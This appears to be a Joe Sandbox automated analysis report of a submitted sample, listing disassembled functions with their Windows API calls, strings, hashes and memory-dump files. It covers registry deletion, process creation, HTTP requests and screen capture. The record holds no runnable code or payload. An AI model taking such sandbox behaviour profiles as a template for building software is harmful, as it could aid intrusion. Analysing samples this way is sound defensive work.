Part of subcall function 00BCF9F2: _wcslen.LIBCMT ref: 00BCF9FD

GetDriveTypeW.KERNEL32(?,00C76BF0,00000061), ref: 00C24743

Strings

unknown, xrefs: 00C24708
removable, xrefs: 00C245EA, 00C245EF
fixed, xrefs: 00C24635, 00C2463A
cdrom, xrefs: 00C2458F, 00C24594
network, xrefs: 00C2469D, 00C246A2
ramdisk, xrefs: 00C246F1
all, xrefs: 00C24531, 00C24536

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 37d07b96f97b4c94e0f4c738fdb28749fbc648fdac216e88b4f34bbb8773bb3a
Instruction ID: 5fad1606df2d2f4fd35789fb4a76976bcab87b9ac41ed3d0b2bf18e20cbea796
Opcode Fuzzy Hash: 37d07b96f97b4c94e0f4c738fdb28749fbc648fdac216e88b4f34bbb8773bb3a
Instruction Fuzzy Hash: 0CB123316083229FC718DF28E890A7EB7E5BFA5720F50492DF4A6C7691EB70D944CB52

Function 00C3AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C3B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C3B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C3B1D4
_wcslen.LIBCMT ref: 00C3B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C3B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C3B236
_wcslen.LIBCMT ref: 00C3B332

Part of subcall function 00C205A7: GetStdHandle.KERNEL32(000000F6), ref: 00C205C6

_wcslen.LIBCMT ref: 00C3B34B
_wcslen.LIBCMT ref: 00C3B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C3B3B6
GetLastError.KERNEL32(00000000), ref: 00C3B407
CloseHandle.KERNEL32(?), ref: 00C3B439
CloseHandle.KERNEL32(00000000), ref: 00C3B44A
CloseHandle.KERNEL32(00000000), ref: 00C3B45C
CloseHandle.KERNEL32(00000000), ref: 00C3B46E
CloseHandle.KERNEL32(?), ref: 00C3B4E3

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 1f767b9b9c9b52b2d0f9712ab3505202835596be9b1ac6f3fdd9116cb96bef13
Instruction ID: 9ec3e209dde6092750a8b118aaceba31645f9691e655d9c64ff0a7a34b95bba2
Opcode Fuzzy Hash: 1f767b9b9c9b52b2d0f9712ab3505202835596be9b1ac6f3fdd9116cb96bef13
Instruction Fuzzy Hash: C1F1AC316183009FC724EF24C891B6FBBE5AF85310F14859DF99A9B2A2DB71ED44CB52

Function 00BB326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00C81990), ref: 00BF2F8D
GetMenuItemCount.USER32(00C81990), ref: 00BF303D
GetCursorPos.USER32(?), ref: 00BF3081
SetForegroundWindow.USER32(00000000), ref: 00BF308A
TrackPopupMenuEx.USER32(00C81990,00000000,?,00000000,00000000,00000000), ref: 00BF309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00BF30A9

Strings

0, xrefs: 00BB327D

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 3121164803a08efbb358dcbf085c147009e17a063b11dd356f7d2f804296fe76
Instruction ID: a84dda197679b25a2ef276120827421d20fac5da6ffe87faccd5e98050f025a1
Opcode Fuzzy Hash: 3121164803a08efbb358dcbf085c147009e17a063b11dd356f7d2f804296fe76
Instruction Fuzzy Hash: 0C71E170640209BBEB218B64CC89FFEBFE4FB05724F204256F614AA1E0C7B1AD54DB90

Function 00C46CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00C46DEB

Part of subcall function 00BB6B57: _wcslen.LIBCMT ref: 00BB6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C46E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C46E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C46E94
DestroyWindow.USER32(?), ref: 00C46EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BB0000,00000000), ref: 00C46EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C46EFD
GetDesktopWindow.USER32 ref: 00C46F16
GetWindowRect.USER32(00000000), ref: 00C46F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C46F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C46F4D

Part of subcall function 00BC9944: GetWindowLongW.USER32(?,000000EB), ref: 00BC9952

Strings

0, xrefs: 00C46D98
tooltips_class32, xrefs: 00C46E58, 00C46EDD

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: c0306186b51d34707028d90adae6412fa3df236b142ee8c884b517fa356771e8
Instruction ID: dd6d50d53e0c3d8c91bd3bd89fe103e40865578465b3d8ac27a1ed306abbd2c3
Opcode Fuzzy Hash: c0306186b51d34707028d90adae6412fa3df236b142ee8c884b517fa356771e8
Instruction Fuzzy Hash: 3B715B74104344AFEB21CF58DC84FAABBF9FB8A314F04451DF99987261C771A90ACB16

Function 00C4911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BC9BB2

DragQueryPoint.SHELL32(?,?), ref: 00C49147

Part of subcall function 00C47674: ClientToScreen.USER32(?,?), ref: 00C4769A
Part of subcall function 00C47674: GetWindowRect.USER32(?,?), ref: 00C47710
Part of subcall function 00C47674: PtInRect.USER32(?,?,00C48B89), ref: 00C47720

SendMessageW.USER32(?,000000B0,?,?), ref: 00C491B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C491BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C491DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C49225
SendMessageW.USER32(?,000000B0,?,?), ref: 00C4923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00C49255
SendMessageW.USER32(?,000000B1,?,?), ref: 00C49277
DragFinish.SHELL32(?), ref: 00C4927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C49371

Strings

@GUI_DRAGFILE, xrefs: 00C49320
@GUI_DRAGID, xrefs: 00C492E9
@GUI_DROPID, xrefs: 00C4929E

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: ccf0c0f44623533c08ae2165406ad1042e678de80beb3296ad45f90c7886504a
Instruction ID: ac7f8c4f97dc20ae7de45240d4ea8d49ef32845bcdf9d18dec8f626a40fa6c47
Opcode Fuzzy Hash: ccf0c0f44623533c08ae2165406ad1042e678de80beb3296ad45f90c7886504a
Instruction Fuzzy Hash: 0D615871108301AFD701EF64DC85EAFBBE8FF89750F000A6EF995921A1DB709A49CB52

Function 00C2C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C2C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C2C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C2C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C2C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C2C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C2C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C2C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C2C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C2C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C2C5F0
InternetCloseHandle.WININET(00000000), ref: 00C2C5FB

Strings

, xrefs: 00C2C575

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: d886bd482593adf8040eaed44513c6e59ec194c2f3984ab5c88e426a8fa81a6e
Instruction ID: 064210657d8f1c3797aebaebe71fd11069c6f6822bbde7eb354e2da459d3a094
Opcode Fuzzy Hash: d886bd482593adf8040eaed44513c6e59ec194c2f3984ab5c88e426a8fa81a6e
Instruction Fuzzy Hash: B4515AB4501618BFDB219F61D9C8BAF7BFCFF09344F004429F95696A20DB74EA04AB60

Function 00C4856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00C48592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C485A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C485AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C485BA
GlobalLock.KERNEL32(00000000), ref: 00C485C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C485D7
GlobalUnlock.KERNEL32(00000000), ref: 00C485E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C485E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C485F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00C4FC38,?), ref: 00C48611
GlobalFree.KERNEL32(00000000), ref: 00C48621
GetObjectW.GDI32(?,00000018,?), ref: 00C48641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00C48671
DeleteObject.GDI32(?), ref: 00C48699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C486AF

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 99e18a0a59bdd1485646632346f61405a9b158613a3447d66137b1d5d12f7a8a
Instruction ID: b44e9c6a7f9ae7744e81b3133143e884e682a71bff3c4511d3581d7a60bad188
Opcode Fuzzy Hash: 99e18a0a59bdd1485646632346f61405a9b158613a3447d66137b1d5d12f7a8a
Instruction Fuzzy Hash: FC413C75601204AFDB619FA5CC88FAE7BB8FF8A711F104059F915E7260DB709E05DB20

Function 00C214BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00C21502
VariantCopy.OLEAUT32(?,?), ref: 00C2150B
VariantClear.OLEAUT32(?), ref: 00C21517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C215FB
VarR8FromDec.OLEAUT32(?,?), ref: 00C21657
VariantInit.OLEAUT32(?), ref: 00C21708
SysFreeString.OLEAUT32(?), ref: 00C2178C
VariantClear.OLEAUT32(?), ref: 00C217D8
VariantClear.OLEAUT32(?), ref: 00C217E7
VariantInit.OLEAUT32(00000000), ref: 00C21823

Strings

Default, xrefs: 00C216AF
%4d%02d%02d%02d%02d%02d, xrefs: 00C21625

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 7c8e0a90565df57decad0edf25eac1f7606df3ea5178c33e908f26e5532b429f
Instruction ID: 3b23d460225e4239a8cca1fa1a2193f34053e033c50a23921acb617b1edea68b
Opcode Fuzzy Hash: 7c8e0a90565df57decad0edf25eac1f7606df3ea5178c33e908f26e5532b429f
Instruction Fuzzy Hash: 77D1F331A00229DBDB109F66E885BBDB7F5BF55700F1880EAF806AB990DB70DD41DB61

Function 00C3B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

Part of subcall function 00C3C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3B6AE,?,?), ref: 00C3C9B5
Part of subcall function 00C3C998: _wcslen.LIBCMT ref: 00C3C9F1
Part of subcall function 00C3C998: _wcslen.LIBCMT ref: 00C3CA68
Part of subcall function 00C3C998: _wcslen.LIBCMT ref: 00C3CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C3B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C3B772
RegDeleteValueW.ADVAPI32(?,?), ref: 00C3B80A
RegCloseKey.ADVAPI32(?), ref: 00C3B87E
RegCloseKey.ADVAPI32(?), ref: 00C3B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C3B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C3B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 00C3B922
FreeLibrary.KERNEL32(00000000), ref: 00C3B983
RegCloseKey.ADVAPI32(00000000), ref: 00C3B994

Strings

advapi32.dll, xrefs: 00C3B8ED
RegDeleteKeyExW, xrefs: 00C3B8FE

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 027af3bd854f369fc5d642870f8548ec8c34fed236fd3a0f35f070a31d1177cb
Instruction ID: d3233c9a9fb7ffeb5b5b8cfc6e23b3b589735a62fad5fde400e189e2294359fa
Opcode Fuzzy Hash: 027af3bd854f369fc5d642870f8548ec8c34fed236fd3a0f35f070a31d1177cb
Instruction Fuzzy Hash: 4CC18B34218201AFD714DF14C495F6ABBE5FF85308F14859CF6AA8B2A2CB71ED45CB92

Function 00C3255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C325D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C325E8
CreateCompatibleDC.GDI32(?), ref: 00C325F4
SelectObject.GDI32(00000000,?), ref: 00C32601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C3266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00C326AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00C326D0
SelectObject.GDI32(?,?), ref: 00C326D8
DeleteObject.GDI32(?), ref: 00C326E1
DeleteDC.GDI32(?), ref: 00C326E8
ReleaseDC.USER32(00000000,?), ref: 00C326F3

Strings

(, xrefs: 00C3268D

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 05e20b948c798b0df55f567bc394eb0eb81d1b694b355437f08ef4dfa3487af6
Instruction ID: ef3c87b2d232407bb8ef4762968551e74303a5bab0230c295b667ef6bc9962ae
Opcode Fuzzy Hash: 05e20b948c798b0df55f567bc394eb0eb81d1b694b355437f08ef4dfa3487af6
Instruction Fuzzy Hash: 8761E275D01219EFCF14CFA4D885AAEBBF6FF48310F208529E956A7260D770A941DF90

Function 00BEDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00BEDAA1

Part of subcall function 00BED63C: _free.LIBCMT ref: 00BED659
Part of subcall function 00BED63C: _free.LIBCMT ref: 00BED66B
Part of subcall function 00BED63C: _free.LIBCMT ref: 00BED67D
Part of subcall function 00BED63C: _free.LIBCMT ref: 00BED68F
Part of subcall function 00BED63C: _free.LIBCMT ref: 00BED6A1
Part of subcall function 00BED63C: _free.LIBCMT ref: 00BED6B3
Part of subcall function 00BED63C: _free.LIBCMT ref: 00BED6C5
Part of subcall function 00BED63C: _free.LIBCMT ref: 00BED6D7
Part of subcall function 00BED63C: _free.LIBCMT ref: 00BED6E9
Part of subcall function 00BED63C: _free.LIBCMT ref: 00BED6FB
Part of subcall function 00BED63C: _free.LIBCMT ref: 00BED70D
Part of subcall function 00BED63C: _free.LIBCMT ref: 00BED71F
Part of subcall function 00BED63C: _free.LIBCMT ref: 00BED731

_free.LIBCMT ref: 00BEDA96

Part of subcall function 00BE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BED7D1,00000000,00000000,00000000,00000000,?,00BED7F8,00000000,00000007,00000000,?,00BEDBF5,00000000), ref: 00BE29DE
Part of subcall function 00BE29C8: GetLastError.KERNEL32(00000000,?,00BED7D1,00000000,00000000,00000000,00000000,?,00BED7F8,00000000,00000007,00000000,?,00BEDBF5,00000000,00000000), ref: 00BE29F0

_free.LIBCMT ref: 00BEDAB8
_free.LIBCMT ref: 00BEDACD
_free.LIBCMT ref: 00BEDAD8
_free.LIBCMT ref: 00BEDAFA
_free.LIBCMT ref: 00BEDB0D
_free.LIBCMT ref: 00BEDB1B
_free.LIBCMT ref: 00BEDB26
_free.LIBCMT ref: 00BEDB5E
_free.LIBCMT ref: 00BEDB65
_free.LIBCMT ref: 00BEDB82
_free.LIBCMT ref: 00BEDB9A

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 5b3aa79cc4b3863f9b067431ee4bbdf89fe4459d0c9bf07f25abe7bea9ed0e25
Instruction ID: 84f3fdd4c70db89c60fdef8103cd04cf74462d17195a338fad42ddc864a4b027
Opcode Fuzzy Hash: 5b3aa79cc4b3863f9b067431ee4bbdf89fe4459d0c9bf07f25abe7bea9ed0e25
Instruction Fuzzy Hash: 16318F356043899FEB21AB3AE846B5A77E8FF00310F1154B9E458D7292EFB9ED40C720

Function 00C1365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C1369C
_wcslen.LIBCMT ref: 00C136A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C13797
GetClassNameW.USER32(?,?,00000400), ref: 00C1380C
GetDlgCtrlID.USER32(?), ref: 00C1385D
GetWindowRect.USER32(?,?), ref: 00C13882
GetParent.USER32(?), ref: 00C138A0
ScreenToClient.USER32(00000000), ref: 00C138A7
GetClassNameW.USER32(?,?,00000100), ref: 00C13921
GetWindowTextW.USER32(?,?,00000400), ref: 00C1395D

Strings

%s%u, xrefs: 00C13734

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 47410e8ae1a9ec4724ba09ea5792363b5e4e0157ce544dd13b389215763b0e17
Instruction ID: bd2e2f847552133ec9aea22b68771fcbd467c82897cb612996d7b4564ede8c76
Opcode Fuzzy Hash: 47410e8ae1a9ec4724ba09ea5792363b5e4e0157ce544dd13b389215763b0e17
Instruction Fuzzy Hash: 6A91D371200646AFD719DF24C885FEAF7E8FF46354F008529F9A9D2190DB30EA85DBA1

Function 00C14954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00C14994
GetWindowTextW.USER32(?,?,00000400), ref: 00C149DA
_wcslen.LIBCMT ref: 00C149EB
CharUpperBuffW.USER32(?,00000000), ref: 00C149F7
_wcsstr.LIBVCRUNTIME ref: 00C14A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00C14A64
GetWindowTextW.USER32(?,?,00000400), ref: 00C14A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00C14AE6
GetClassNameW.USER32(?,?,00000400), ref: 00C14B20
